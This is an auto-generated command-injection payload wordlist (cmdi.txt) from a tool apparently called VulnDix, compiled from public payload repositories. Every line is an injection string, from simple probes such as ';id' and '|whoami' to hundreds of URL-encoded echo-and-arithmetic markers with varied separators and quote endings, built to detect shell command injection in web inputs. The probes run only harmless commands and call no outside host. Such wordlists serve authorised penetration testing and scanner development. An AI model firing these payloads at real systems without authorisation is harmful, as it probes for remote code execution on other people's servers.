# VulnDix — cmdi.txt (gerado automaticamente)
# Total: 500 payloads | Fontes online: 1
# Repositórios: swisskyrepo/PayloadsAllTheThings, danielmiessler/SecLists, fuzzdb-project/fuzzdb
;id
|id
&id
`id`
$(id)
;whoami
|whoami
%0aid
||id
&&id
echo%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ
%20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY
;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG
&echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF
|echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE
||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE
&&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS
%0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ
%3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET
%26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV
%26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB
%7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG
%7C%7Cecho%20KRCSNE$((57%2B75))$(echo%20KRCSNE)KRCSNE
echo%20IFNPXI$((40%2B99))$(echo%20IFNPXI)IFNPXI'
%20echo%20HBFEEM$((46%2B2))$(echo%20HBFEEM)HBFEEM'
;echo%20KHMFRS$((69%2B67))$(echo%20KHMFRS)KHMFRS'
&echo%20DACXMN$((57%2B35))$(echo%20DACXMN)DACXMN'
|echo%20DDLJJW$((33%2B23))$(echo%20DDLJJW)DDLJJW'
||echo%20XIYAUA$((17%2B90))$(echo%20XIYAUA)XIYAUA'
&&echo%20CMMOTV$((30%2B10))$(echo%20CMMOTV)CMMOTV'
%0aecho%20VKWHEH$((83%2B36))$(echo%20VKWHEH)VKWHEH'
%3Becho%20RDKWWC$((22%2B44))$(echo%20RDKWWC)RDKWWC'
%26echo%20VOANQN$((77%2B86))$(echo%20VOANQN)VOANQN'
%26%26echo%20EXUMZL$((4%2B99))$(echo%20EXUMZL)EXUMZL'
%7Cecho%20VDZSYZ$((58%2B1))$(echo%20VDZSYZ)VDZSYZ'
%7C%7Cecho%20HYHREQ$((78%2B11))$(echo%20HYHREQ)HYHREQ'
echo%20GHWFXG$((12%2B72))$(echo%20GHWFXG)GHWFXG"
%20echo%20BAJXZZ$((73%2B7))$(echo%20BAJXZZ)BAJXZZ"
;echo%20YRBNTY$((83%2B14))$(echo%20YRBNTY)YRBNTY"
&echo%20WQLTXV$((0%2B25))$(echo%20WQLTXV)WQLTXV"
|echo%20PRCGGO$((57%2B79))$(echo%20PRCGGO)PRCGGO"
||echo%20RWZHCR$((74%2B28))$(echo%20RWZHCR)RWZHCR"
&&echo%20QTDSQL$((20%2B35))$(echo%20QTDSQL)QTDSQL"
%0aecho%20NCRQQT$((66%2B95))$(echo%20NCRQQT)NCRQQT"
%3Becho%20QXBWJP$((56%2B78))$(echo%20QXBWJP)QXBWJP"
%26echo%20YYWLTQ$((61%2B71))$(echo%20YYWLTQ)YYWLTQ"
%26%26echo%20XKFEGJ$((1%2B49))$(echo%20XKFEGJ)XKFEGJ"
%7Cecho%20YPOSVR$((24%2B62))$(echo%20YPOSVR)YPOSVR"
%7C%7Cecho%20CFGBVN$((38%2B88))$(echo%20CFGBVN)CFGBVN"
echo%20CWRXRJ$((77%2B13))$(echo%20CWRXRJ)CWRXRJ
%20echo%20IBQHOS$((92%2B76))$(echo%20IBQHOS)IBQHOS
;echo%20CSPAAF$((48%2B26))$(echo%20CSPAAF)CSPAAF
&echo%20DRUCFI$((69%2B56))$(echo%20DRUCFI)DRUCFI
|echo%20TWNZDU$((10%2B40))$(echo%20TWNZDU)TWNZDU
||echo%20TPIMPW$((11%2B13))$(echo%20TPIMPW)TPIMPW
&&echo%20FOJNEL$((64%2B8))$(echo%20FOJNEL)FOJNEL
%0aecho%20MBVQWK$((48%2B90))$(echo%20MBVQWK)MBVQWK
%3Becho%20RHJGKQ$((38%2B71))$(echo%20RHJGKQ)RHJGKQ
%26echo%20MUQJWT$((7%2B78))$(echo%20MUQJWT)MUQJWT
%26%26echo%20KHAVOV$((90%2B77))$(echo%20KHAVOV)KHAVOV
%7Cecho%20SUHDBU$((66%2B15))$(echo%20SUHDBU)SUHDBU
%7C%7Cecho%20FEGCUU$((21%2B29))$(echo%20FEGCUU)FEGCUU
echo%20DINEVC$((57%2B17))$(echo%20DINEVC)DINEVC//
%20echo%20BSYIFX$((64%2B71))$(echo%20BSYIFX)BSYIFX//
;echo%20FRDAGY$((96%2B63))$(echo%20FRDAGY)FRDAGY//
&echo%20QLUITC$((73%2B99))$(echo%20QLUITC)QLUITC//
|echo%20SBZVBA$((97%2B74))$(echo%20SBZVBA)SBZVBA//
||echo%20ZZJQZV$((83%2B59))$(echo%20ZZJQZV)ZZJQZV//
&&echo%20RIWFAA$((64%2B99))$(echo%20RIWFAA)RIWFAA//
%0aecho%20MESJOF$((62%2B27))$(echo%20MESJOF)MESJOF//
%3Becho%20SVKHMK$((30%2B19))$(echo%20SVKHMK)SVKHMK//
%26echo%20ZPAVCI$((24%2B53))$(echo%20ZPAVCI)ZPAVCI//
%26%26echo%20MXMWUR$((62%2B86))$(echo%20MXMWUR)MXMWUR//
%7Cecho%20AGUYET$((89%2B40))$(echo%20AGUYET)AGUYET//
%7C%7Cecho%20SBQJMU$((91%2B44))$(echo%20SBQJMU)SBQJMU//
echo%20ZUXLTJ$((16%2B69))$(echo%20ZUXLTJ)ZUXLTJ\
%20echo%20QQZCOQ$((29%2B94))$(echo%20QQZCOQ)QQZCOQ\
;echo%20KHCYPO$((77%2B38))$(echo%20KHCYPO)KHCYPO\
&echo%20MCEEEZ$((59%2B2))$(echo%20MCEEEZ)MCEEEZ\
|echo%20OYDZIJ$((96%2B61))$(echo%20OYDZIJ)OYDZIJ\
||echo%20PJBTDO$((60%2B74))$(echo%20PJBTDO)PJBTDO\
&&echo%20HETHMD$((47%2B99))$(echo%20HETHMD)HETHMD\
%0aecho%20HNNUGD$((25%2B95))$(echo%20HNNUGD)HNNUGD\
%3Becho%20OFIKGO$((60%2B50))$(echo%20OFIKGO)OFIKGO\
%26echo%20RKCZIL$((79%2B92))$(echo%20RKCZIL)RKCZIL\
%26%26echo%20WLJUON$((15%2B95))$(echo%20WLJUON)WLJUON\
%7Cecho%20WEBPND$((27%2B55))$(echo%20WEBPND)WEBPND\
%7C%7Cecho%20HKTMWP$((40%2B9))$(echo%20HKTMWP)HKTMWP\
echo%20MTEZNM$((22%2B3))$(echo%20MTEZNM)MTEZNM&
%20echo%20YPQTYX$((9%2B27))$(echo%20YPQTYX)YPQTYX&
;echo%20UNXFGJ$((26%2B60))$(echo%20UNXFGJ)UNXFGJ&
&echo%20KUCRVN$((73%2B39))$(echo%20KUCRVN)KUCRVN&
|echo%20FNYPPK$((77%2B83))$(echo%20FNYPPK)FNYPPK&
||echo%20NRVZFD$((41%2B1))$(echo%20NRVZFD)NRVZFD&
&&echo%20QAGWEJ$((84%2B54))$(echo%20QAGWEJ)QAGWEJ&
%0aecho%20HNTZSH$((50%2B30))$(echo%20HNTZSH)HNTZSH&
%3Becho%20HGVPJY$((28%2B49))$(echo%20HGVPJY)HGVPJY&
%26echo%20FWAUTF$((39%2B22))$(echo%20FWAUTF)FWAUTF&
%26%26echo%20BSQKBM$((74%2B49))$(echo%20BSQKBM)BSQKBM&
%7Cecho%20SEIDBX$((80%2B51))$(echo%20SEIDBX)SEIDBX&
%7C%7Cecho%20TVKSTF$((99%2B96))$(echo%20TVKSTF)TVKSTF&
echo%20XOEUCM$((23%2B30))$(echo%20XOEUCM)XOEUCM|
%20echo%20DRFYNB$((7%2B97))$(echo%20DRFYNB)DRFYNB|
;echo%20SIRYMP$((7%2B6))$(echo%20SIRYMP)SIRYMP|
&echo%20SPRAWO$((58%2B5))$(echo%20SPRAWO)SPRAWO|
|echo%20OTDJOE$((4%2B21))$(echo%20OTDJOE)OTDJOE|
||echo%20RFRIIL$((68%2B10))$(echo%20RFRIIL)RFRIIL|
&&echo%20GKEMGA$((51%2B90))$(echo%20GKEMGA)GKEMGA|
%0aecho%20ZNOLCP$((67%2B83))$(echo%20ZNOLCP)ZNOLCP|
%3Becho%20PSHEAA$((43%2B12))$(echo%20PSHEAA)PSHEAA|
%26echo%20YPFSZA$((90%2B71))$(echo%20YPFSZA)YPFSZA|
%26%26echo%20BHDDGG$((67%2B94))$(echo%20BHDDGG)BHDDGG|
%7Cecho%20UFFOUX$((59%2B47))$(echo%20UFFOUX)UFFOUX|
%7C%7Cecho%20CXXXGW$((34%2B53))$(echo%20CXXXGW)CXXXGW|
echo%20URJEMH$((2%2B45))$(echo%20URJEMH)URJEMH%27
%20echo%20ALRHIH$((11%2B27))$(echo%20ALRHIH)ALRHIH%27
;echo%20IPTSZG$((46%2B17))$(echo%20IPTSZG)IPTSZG%27
&echo%20YHCAGI$((22%2B26))$(echo%20YHCAGI)YHCAGI%27
|echo%20DZPIWA$((18%2B47))$(echo%20DZPIWA)DZPIWA%27
||echo%20SJZFWV$((8%2B68))$(echo%20SJZFWV)SJZFWV%27
&&echo%20QZXLOK$((2%2B27))$(echo%20QZXLOK)QZXLOK%27
%0aecho%20URBCMK$((17%2B54))$(echo%20URBCMK)URBCMK%27
%3Becho%20QHDGWH$((99%2B66))$(echo%20QHDGWH)QHDGWH%27
%26echo%20WOTYOT$((32%2B39))$(echo%20WOTYOT)WOTYOT%27
%26%26echo%20CSSQPT$((9%2B40))$(echo%20CSSQPT)CSSQPT%27
%7Cecho%20CPQTYB$((64%2B20))$(echo%20CPQTYB)CPQTYB%27
%7C%7Cecho%20EBGHXU$((74%2B4))$(echo%20EBGHXU)EBGHXU%27
echo%20LENNLE$((14%2B89))$(echo%20LENNLE)LENNLE%22
%20echo%20FPVLKT$((63%2B87))$(echo%20FPVLKT)FPVLKT%22
;echo%20OIHFAC$((90%2B34))$(echo%20OIHFAC)OIHFAC%22
&echo%20QLFUON$((35%2B62))$(echo%20QLFUON)QLFUON%22
|echo%20GEPPDW$((55%2B58))$(echo%20GEPPDW)GEPPDW%22
||echo%20DETQCQ$((28%2B83))$(echo%20DETQCQ)DETQCQ%22
&&echo%20BALAGY$((97%2B95))$(echo%20BALAGY)BALAGY%22
%0aecho%20PETUUK$((81%2B85))$(echo%20PETUUK)PETUUK%22
%3Becho%20LBKHXK$((90%2B74))$(echo%20LBKHXK)LBKHXK%22
%26echo%20JOADAU$((32%2B46))$(echo%20JOADAU)JOADAU%22
%26%26echo%20DNDLZD$((92%2B6))$(echo%20DNDLZD)DNDLZD%22
%7Cecho%20ORHNZL$((45%2B63))$(echo%20ORHNZL)ORHNZL%22
%7C%7Cecho%20TEDJVC$((96%2B45))$(echo%20TEDJVC)TEDJVC%22
echo%20AQRKLL$((20%2B31))$(echo%20AQRKLL)AQRKLL%5C%5C
%20echo%20CKFAYE$((18%2B45))$(echo%20CKFAYE)CKFAYE%5C%5C
;echo%20HYBMMW$((16%2B36))$(echo%20HYBMMW)HYBMMW%5C%5C
&echo%20NOKSUR$((8%2B35))$(echo%20NOKSUR)NOKSUR%5C%5C
|echo%20OTDXSU$((6%2B1))$(echo%20OTDXSU)OTDXSU%5C%5C
||echo%20KFLFGL$((10%2B4))$(echo%20KFLFGL)KFLFGL%5C%5C
&&echo%20MKGYYL$((46%2B31))$(echo%20MKGYYL)MKGYYL%5C%5C
%0aecho%20ANSTBN$((20%2B35))$(echo%20ANSTBN)ANSTBN%5C%5C
%3Becho%20OHYLGW$((56%2B18))$(echo%20OHYLGW)OHYLGW%5C%5C
%26echo%20NFGINK$((64%2B92))$(echo%20NFGINK)NFGINK%5C%5C
%26%26echo%20EJACRB$((30%2B66))$(echo%20EJACRB)EJACRB%5C%5C
%7Cecho%20QNJYVT$((4%2B44))$(echo%20QNJYVT)QNJYVT%5C%5C
%7C%7Cecho%20UBHYQD$((55%2B41))$(echo%20UBHYQD)UBHYQD%5C%5C
echo%20TJAXUJ$((80%2B70))$(echo%20TJAXUJ)TJAXUJ%2F%2F
%20echo%20RGMCLI$((27%2B75))$(echo%20RGMCLI)RGMCLI%2F%2F
;echo%20KUXGTM$((7%2B89))$(echo%20KUXGTM)KUXGTM%2F%2F
&echo%20CCYVIF$((50%2B63))$(echo%20CCYVIF)CCYVIF%2F%2F
|echo%20GRWCHE$((81%2B54))$(echo%20GRWCHE)GRWCHE%2F%2F
||echo%20OZJGZU$((76%2B56))$(echo%20OZJGZU)OZJGZU%2F%2F
&&echo%20RLCXAD$((4%2B93))$(echo%20RLCXAD)RLCXAD%2F%2F
%0aecho%20KYMBVZ$((7%2B62))$(echo%20KYMBVZ)KYMBVZ%2F%2F
%3Becho%20SVFHGU$((48%2B4))$(echo%20SVFHGU)SVFHGU%2F%2F
%26echo%20OXZPGU$((40%2B61))$(echo%20OXZPGU)OXZPGU%2F%2F
%26%26echo%20PUUCTR$((68%2B33))$(echo%20PUUCTR)PUUCTR%2F%2F
%7Cecho%20CGYJPN$((45%2B35))$(echo%20CGYJPN)CGYJPN%2F%2F
%7C%7Cecho%20XVNYDY$((93%2B18))$(echo%20XVNYDY)XVNYDY%2F%2F
echo%20ZZAYTQ$((30%2B82))$(echo%20ZZAYTQ)ZZAYTQ%26
%20echo%20TWTKKJ$((67%2B81))$(echo%20TWTKKJ)TWTKKJ%26
;echo%20DDXENF$((29%2B82))$(echo%20DDXENF)DDXENF%26
&echo%20JFDHZU$((1%2B12))$(echo%20JFDHZU)JFDHZU%26
|echo%20PAKNUK$((48%2B25))$(echo%20PAKNUK)PAKNUK%26
||echo%20IHELYG$((76%2B62))$(echo%20IHELYG)IHELYG%26
&&echo%20LOAKXY$((52%2B22))$(echo%20LOAKXY)LOAKXY%26
%0aecho%20JXLHHG$((94%2B73))$(echo%20JXLHHG)JXLHHG%26
%3Becho%20FAHQNN$((39%2B84))$(echo%20FAHQNN)FAHQNN%26
%26echo%20RDICIX$((99%2B44))$(echo%20RDICIX)RDICIX%26
%26%26echo%20ZTWRSM$((30%2B32))$(echo%20ZTWRSM)ZTWRSM%26
%7Cecho%20LLYIHD$((46%2B68))$(echo%20LLYIHD)LLYIHD%26
%7C%7Cecho%20OYGMVZ$((16%2B56))$(echo%20OYGMVZ)OYGMVZ%26
echo%20LZWGVJ$((6%2B60))$(echo%20LZWGVJ)LZWGVJ%7C
%20echo%20YEOGLL$((28%2B5))$(echo%20YEOGLL)YEOGLL%7C
;echo%20MXKHVK$((46%2B71))$(echo%20MXKHVK)MXKHVK%7C
&echo%20OSJJGL$((20%2B68))$(echo%20OSJJGL)OSJJGL%7C
|echo%20FZLTEJ$((27%2B72))$(echo%20FZLTEJ)FZLTEJ%7C
||echo%20ZLPJPQ$((81%2B32))$(echo%20ZLPJPQ)ZLPJPQ%7C
&&echo%20KXTSXC$((16%2B52))$(echo%20KXTSXC)KXTSXC%7C
%0aecho%20QUHONN$((15%2B27))$(echo%20QUHONN)QUHONN%7C
%3Becho%20YORHEJ$((41%2B36))$(echo%20YORHEJ)YORHEJ%7C
%26echo%20MHEMLM$((72%2B41))$(echo%20MHEMLM)MHEMLM%7C
%26%26echo%20FFQWQY$((35%2B58))$(echo%20FFQWQY)FFQWQY%7C
%7Cecho%20DPZHUT$((28%2B81))$(echo%20DPZHUT)DPZHUT%7C
%7C%7Cecho%20FFBSEF$((15%2B13))$(echo%20FFBSEF)FFBSEF%7C
'echo%20OKVFZD$((59%2B78))$(echo%20OKVFZD)OKVFZD
'%20echo%20KSLOZF$((6%2B29))$(echo%20KSLOZF)KSLOZF
';echo%20PWKXHB$((27%2B16))$(echo%20PWKXHB)PWKXHB
'&echo%20EBREVB$((48%2B67))$(echo%20EBREVB)EBREVB
'|echo%20TRMWWT$((44%2B53))$(echo%20TRMWWT)TRMWWT
'||echo%20JQACJR$((33%2B35))$(echo%20JQACJR)JQACJR
'&&echo%20ZJEXPP$((7%2B99))$(echo%20ZJEXPP)ZJEXPP
'%0aecho%20ICLECP$((72%2B88))$(echo%20ICLECP)ICLECP
'%3Becho%20VUJCMW$((70%2B75))$(echo%20VUJCMW)VUJCMW
'%26echo%20JPCWXJ$((42%2B48))$(echo%20JPCWXJ)JPCWXJ
'%26%26echo%20ATQDYD$((66%2B7))$(echo%20ATQDYD)ATQDYD
'%7Cecho%20LPCJMS$((42%2B26))$(echo%20LPCJMS)LPCJMS
'%7C%7Cecho%20PROWNM$((55%2B15))$(echo%20PROWNM)PROWNM
'echo%20VKYYJY$((60%2B15))$(echo%20VKYYJY)VKYYJY'
'%20echo%20CFTYMJ$((83%2B12))$(echo%20CFTYMJ)CFTYMJ'
';echo%20NUCRTG$((61%2B63))$(echo%20NUCRTG)NUCRTG'
'&echo%20COKQPG$((93%2B87))$(echo%20COKQPG)COKQPG'
'|echo%20VQUOCA$((12%2B35))$(echo%20VQUOCA)VQUOCA'
'||echo%20QPBCIU$((74%2B42))$(echo%20QPBCIU)QPBCIU'
'&&echo%20TWQKFP$((48%2B69))$(echo%20TWQKFP)TWQKFP'
'%0aecho%20BTIFJC$((66%2B80))$(echo%20BTIFJC)BTIFJC'
'%3Becho%20URYBVY$((71%2B95))$(echo%20URYBVY)URYBVY'
'%26echo%20SDBGBI$((27%2B20))$(echo%20SDBGBI)SDBGBI'
'%26%26echo%20CMXOJB$((29%2B98))$(echo%20CMXOJB)CMXOJB'
'%7Cecho%20CFOPSJ$((27%2B97))$(echo%20CFOPSJ)CFOPSJ'
'%7C%7Cecho%20YHTZHZ$((60%2B82))$(echo%20YHTZHZ)YHTZHZ'
'echo%20DYFBHG$((50%2B7))$(echo%20DYFBHG)DYFBHG"
'%20echo%20JADUEG$((82%2B93))$(echo%20JADUEG)JADUEG"
';echo%20PYWYEX$((88%2B85))$(echo%20PYWYEX)PYWYEX"
'&echo%20AGXFEH$((96%2B88))$(echo%20AGXFEH)AGXFEH"
'|echo%20CKJBUZ$((1%2B22))$(echo%20CKJBUZ)CKJBUZ"
'||echo%20GPBEGV$((20%2B34))$(echo%20GPBEGV)GPBEGV"
'&&echo%20BSQSGI$((11%2B44))$(echo%20BSQSGI)BSQSGI"
'%0aecho%20SZLYQY$((17%2B3))$(echo%20SZLYQY)SZLYQY"
'%3Becho%20MAQCNL$((34%2B31))$(echo%20MAQCNL)MAQCNL"
'%26echo%20YBINSK$((62%2B49))$(echo%20YBINSK)YBINSK"
'%26%26echo%20YBQKFD$((48%2B31))$(echo%20YBQKFD)YBQKFD"
'%7Cecho%20UJMTRL$((89%2B70))$(echo%20UJMTRL)UJMTRL"
'%7C%7Cecho%20QSKTXK$((24%2B37))$(echo%20QSKTXK)QSKTXK"
'echo%20KOOMPK$((13%2B41))$(echo%20KOOMPK)KOOMPK
'%20echo%20MJNNEW$((18%2B53))$(echo%20MJNNEW)MJNNEW
';echo%20HTPOKC$((39%2B32))$(echo%20HTPOKC)HTPOKC
'&echo%20CLYXGN$((72%2B81))$(echo%20CLYXGN)CLYXGN
'|echo%20CTNHMN$((74%2B58))$(echo%20CTNHMN)CTNHMN
'||echo%20TOWNYH$((45%2B79))$(echo%20TOWNYH)TOWNYH
'&&echo%20KYOISY$((63%2B3))$(echo%20KYOISY)KYOISY
'%0aecho%20EIOCXK$((27%2B80))$(echo%20EIOCXK)EIOCXK
'%3Becho%20LMKOMS$((85%2B51))$(echo%20LMKOMS)LMKOMS
'%26echo%20XIZQEH$((78%2B28))$(echo%20XIZQEH)XIZQEH
'%26%26echo%20AKFLIE$((27%2B64))$(echo%20AKFLIE)AKFLIE
'%7Cecho%20TOTSLG$((60%2B1))$(echo%20TOTSLG)TOTSLG
'%7C%7Cecho%20DVAMSG$((74%2B5))$(echo%20DVAMSG)DVAMSG
'echo%20GGRVQX$((86%2B56))$(echo%20GGRVQX)GGRVQX//
'%20echo%20WWHRDZ$((5%2B86))$(echo%20WWHRDZ)WWHRDZ//
';echo%20YDSNXZ$((29%2B43))$(echo%20YDSNXZ)YDSNXZ//
'&echo%20BRXZKX$((10%2B84))$(echo%20BRXZKX)BRXZKX//
'|echo%20ZMCCDQ$((18%2B56))$(echo%20ZMCCDQ)ZMCCDQ//
'||echo%20XNZLSA$((34%2B75))$(echo%20XNZLSA)XNZLSA//
'&&echo%20SKRKXO$((18%2B5))$(echo%20SKRKXO)SKRKXO//
'%0aecho%20WIRUWF$((87%2B88))$(echo%20WIRUWF)WIRUWF//
'%3Becho%20LIHHVF$((18%2B45))$(echo%20LIHHVF)LIHHVF//
'%26echo%20VDQUYJ$((41%2B46))$(echo%20VDQUYJ)VDQUYJ//
'%26%26echo%20EKWZHX$((96%2B4))$(echo%20EKWZHX)EKWZHX//
'%7Cecho%20LLJKNH$((3%2B88))$(echo%20LLJKNH)LLJKNH//
'%7C%7Cecho%20CNSLVN$((6%2B10))$(echo%20CNSLVN)CNSLVN//
'echo%20UVXCGD$((51%2B43))$(echo%20UVXCGD)UVXCGD\
'%20echo%20BYBKHF$((87%2B41))$(echo%20BYBKHF)BYBKHF\
';echo%20ACEKKI$((66%2B70))$(echo%20ACEKKI)ACEKKI\
'&echo%20WHEUEX$((35%2B4))$(echo%20WHEUEX)WHEUEX\
'|echo%20LTTDYL$((1%2B42))$(echo%20LTTDYL)LTTDYL\
'||echo%20VAYJRW$((6%2B1))$(echo%20VAYJRW)VAYJRW\
'&&echo%20WZZOUT$((83%2B36))$(echo%20WZZOUT)WZZOUT\
'%0aecho%20BMHVJK$((19%2B30))$(echo%20BMHVJK)BMHVJK\
'%3Becho%20HQBNCX$((10%2B83))$(echo%20HQBNCX)HQBNCX\
'%26echo%20BRROSL$((24%2B11))$(echo%20BRROSL)BRROSL\
'%26%26echo%20IKUKJX$((80%2B89))$(echo%20IKUKJX)IKUKJX\
'%7Cecho%20KAJAPA$((75%2B48))$(echo%20KAJAPA)KAJAPA\
'%7C%7Cecho%20JJSSJL$((99%2B38))$(echo%20JJSSJL)JJSSJL\
'echo%20QQEHPP$((69%2B2))$(echo%20QQEHPP)QQEHPP&
'%20echo%20JFTFZW$((33%2B39))$(echo%20JFTFZW)JFTFZW&
';echo%20PYZNPF$((23%2B64))$(echo%20PYZNPF)PYZNPF&
'&echo%20XYOEXK$((74%2B11))$(echo%20XYOEXK)XYOEXK&
'|echo%20YCIXVI$((40%2B81))$(echo%20YCIXVI)YCIXVI&
'||echo%20GERZZX$((98%2B84))$(echo%20GERZZX)GERZZX&
'&&echo%20HVTWDK$((44%2B47))$(echo%20HVTWDK)HVTWDK&
'%0aecho%20MGXPRT$((51%2B4))$(echo%20MGXPRT)MGXPRT&
'%3Becho%20UFYCCQ$((51%2B2))$(echo%20UFYCCQ)UFYCCQ&
'%26echo%20JUIBAU$((1%2B74))$(echo%20JUIBAU)JUIBAU&
'%26%26echo%20BMIIJQ$((29%2B3))$(echo%20BMIIJQ)BMIIJQ&
'%7Cecho%20ZPVFOX$((81%2B22))$(echo%20ZPVFOX)ZPVFOX&
'%7C%7Cecho%20SLVMKV$((96%2B0))$(echo%20SLVMKV)SLVMKV&
'echo%20HBTLLE$((1%2B32))$(echo%20HBTLLE)HBTLLE|
'%20echo%20HNOLCQ$((85%2B27))$(echo%20HNOLCQ)HNOLCQ|
';echo%20CCXTNP$((57%2B74))$(echo%20CCXTNP)CCXTNP|
'&echo%20ELYXQO$((59%2B10))$(echo%20ELYXQO)ELYXQO|
'|echo%20NUZDZT$((76%2B71))$(echo%20NUZDZT)NUZDZT|
'||echo%20LAPJJF$((87%2B11))$(echo%20LAPJJF)LAPJJF|
'&&echo%20TWKYHE$((0%2B57))$(echo%20TWKYHE)TWKYHE|
'%0aecho%20MAOXEM$((48%2B53))$(echo%20MAOXEM)MAOXEM|
'%3Becho%20QGKSLY$((79%2B94))$(echo%20QGKSLY)QGKSLY|
'%26echo%20UCANNA$((30%2B68))$(echo%20UCANNA)UCANNA|
'%26%26echo%20ZWVYHU$((11%2B21))$(echo%20ZWVYHU)ZWVYHU|
'%7Cecho%20DPUJIL$((23%2B45))$(echo%20DPUJIL)DPUJIL|
'%7C%7Cecho%20BHFQIY$((13%2B3))$(echo%20BHFQIY)BHFQIY|
'echo%20ZKEZHZ$((79%2B67))$(echo%20ZKEZHZ)ZKEZHZ%27
'%20echo%20DCFSTX$((93%2B73))$(echo%20DCFSTX)DCFSTX%27
';echo%20HPSGQK$((19%2B98))$(echo%20HPSGQK)HPSGQK%27
'&echo%20LTTPNV$((10%2B90))$(echo%20LTTPNV)LTTPNV%27
'|echo%20RAKMKS$((5%2B89))$(echo%20RAKMKS)RAKMKS%27
'||echo%20SGXVWY$((48%2B78))$(echo%20SGXVWY)SGXVWY%27
'&&echo%20XOCEJG$((66%2B21))$(echo%20XOCEJG)XOCEJG%27
'%0aecho%20PPSKOS$((66%2B51))$(echo%20PPSKOS)PPSKOS%27
'%3Becho%20HKYEGB$((78%2B19))$(echo%20HKYEGB)HKYEGB%27
'%26echo%20YRIYND$((40%2B81))$(echo%20YRIYND)YRIYND%27
'%26%26echo%20SWZBKK$((94%2B84))$(echo%20SWZBKK)SWZBKK%27
'%7Cecho%20KIELDL$((12%2B2))$(echo%20KIELDL)KIELDL%27
'%7C%7Cecho%20AXSULH$((48%2B60))$(echo%20AXSULH)AXSULH%27
'echo%20WIBNDS$((23%2B85))$(echo%20WIBNDS)WIBNDS%22
'%20echo%20HBUFGZ$((85%2B26))$(echo%20HBUFGZ)HBUFGZ%22
';echo%20RHFTCS$((28%2B7))$(echo%20RHFTCS)RHFTCS%22
'&echo%20RJCCAT$((53%2B34))$(echo%20RJCCAT)RJCCAT%22
'|echo%20UTCPPJ$((1%2B15))$(echo%20UTCPPJ)UTCPPJ%22
'||echo%20DNOHYC$((47%2B59))$(echo%20DNOHYC)DNOHYC%22
'&&echo%20SXUJKT$((94%2B38))$(echo%20SXUJKT)SXUJKT%22
'%0aecho%20GGGPWE$((90%2B87))$(echo%20GGGPWE)GGGPWE%22
'%3Becho%20WIJQLD$((58%2B39))$(echo%20WIJQLD)WIJQLD%22
'%26echo%20PXNVTZ$((92%2B1))$(echo%20PXNVTZ)PXNVTZ%22
'%26%26echo%20DDHYJG$((44%2B11))$(echo%20DDHYJG)DDHYJG%22
'%7Cecho%20WUSBMH$((6%2B46))$(echo%20WUSBMH)WUSBMH%22
'%7C%7Cecho%20ZJAXER$((49%2B60))$(echo%20ZJAXER)ZJAXER%22
'echo%20GZXGVN$((4%2B70))$(echo%20GZXGVN)GZXGVN%5C%5C
'%20echo%20UXKTUC$((59%2B25))$(echo%20UXKTUC)UXKTUC%5C%5C
';echo%20KKGOUA$((23%2B96))$(echo%20KKGOUA)KKGOUA%5C%5C
'&echo%20QFGFEP$((28%2B72))$(echo%20QFGFEP)QFGFEP%5C%5C
'|echo%20LRGWPW$((14%2B39))$(echo%20LRGWPW)LRGWPW%5C%5C
'||echo%20ANRNDB$((81%2B57))$(echo%20ANRNDB)ANRNDB%5C%5C
'&&echo%20XWGNWJ$((33%2B16))$(echo%20XWGNWJ)XWGNWJ%5C%5C
'%0aecho%20IMHMUF$((78%2B85))$(echo%20IMHMUF)IMHMUF%5C%5C
'%3Becho%20JPRQKB$((93%2B89))$(echo%20JPRQKB)JPRQKB%5C%5C
'%26echo%20NKMKNI$((64%2B82))$(echo%20NKMKNI)NKMKNI%5C%5C
'%26%26echo%20PMWJRH$((60%2B59))$(echo%20PMWJRH)PMWJRH%5C%5C
'%7Cecho%20RHSIRJ$((85%2B6))$(echo%20RHSIRJ)RHSIRJ%5C%5C
'%7C%7Cecho%20NEBEJR$((3%2B38))$(echo%20NEBEJR)NEBEJR%5C%5C
'echo%20OLRHZX$((22%2B72))$(echo%20OLRHZX)OLRHZX%2F%2F
'%20echo%20PPRCPS$((95%2B69))$(echo%20PPRCPS)PPRCPS%2F%2F
';echo%20ICITTS$((63%2B83))$(echo%20ICITTS)ICITTS%2F%2F
'&echo%20FXSADU$((58%2B85))$(echo%20FXSADU)FXSADU%2F%2F
'|echo%20NINPLO$((85%2B22))$(echo%20NINPLO)NINPLO%2F%2F
'||echo%20UAPCZM$((19%2B50))$(echo%20UAPCZM)UAPCZM%2F%2F
'&&echo%20JGTGES$((48%2B34))$(echo%20JGTGES)JGTGES%2F%2F
'%0aecho%20QVUNCP$((53%2B11))$(echo%20QVUNCP)QVUNCP%2F%2F
'%3Becho%20GHQCJV$((24%2B65))$(echo%20GHQCJV)GHQCJV%2F%2F
'%26echo%20ZXUJMM$((66%2B53))$(echo%20ZXUJMM)ZXUJMM%2F%2F
'%26%26echo%20UWWBJC$((28%2B91))$(echo%20UWWBJC)UWWBJC%2F%2F
'%7Cecho%20ZGANEQ$((95%2B91))$(echo%20ZGANEQ)ZGANEQ%2F%2F
'%7C%7Cecho%20WVNPRW$((44%2B23))$(echo%20WVNPRW)WVNPRW%2F%2F
'echo%20ZQODFO$((38%2B30))$(echo%20ZQODFO)ZQODFO%26
'%20echo%20VBRTZG$((57%2B99))$(echo%20VBRTZG)VBRTZG%26
';echo%20EDEYQK$((45%2B89))$(echo%20EDEYQK)EDEYQK%26
'&echo%20HUEWVL$((15%2B9))$(echo%20HUEWVL)HUEWVL%26
'|echo%20FWJJDN$((64%2B27))$(echo%20FWJJDN)FWJJDN%26
'||echo%20DJIUPG$((86%2B80))$(echo%20DJIUPG)DJIUPG%26
'&&echo%20LQMLDZ$((74%2B43))$(echo%20LQMLDZ)LQMLDZ%26
'%0aecho%20VECHDM$((44%2B40))$(echo%20VECHDM)VECHDM%26
'%3Becho%20ZPQVVV$((58%2B25))$(echo%20ZPQVVV)ZPQVVV%26
